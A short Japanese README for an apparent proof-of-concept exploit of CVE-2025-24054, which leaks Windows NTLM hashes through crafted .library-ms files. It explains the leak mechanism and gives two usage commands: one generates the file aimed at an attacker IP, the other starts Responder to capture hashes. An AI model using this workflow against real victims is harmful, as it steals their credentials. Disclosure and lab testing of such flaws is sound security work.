
CVE-2025-24054 – Windows ライブラリ(.library-ms)NTLM ハッシュ漏えいの脆弱性に関するシンプルな概念実証(PoC)です。
⚠️ 教育目的および許可されたラボ環境でのみ使用してください
CVE-2025-24054 は、特別に細工された .library-ms ファイルを使用することで、攻撃者に Windows システム上の被害者の Net-NTLMv2 ハッシュ を漏えいさせることができる脆弱性です。
被害者が悪意のある .library-ms ファイルを含む ZIP を展開すると、Windows Explorer が自動的に SMB 接続を開始し、NTLM ハッシュを漏えいさせます。
.library-ms ファイルを生成します。
python poc.py -i YOUR-IP
sudo responder -I eth0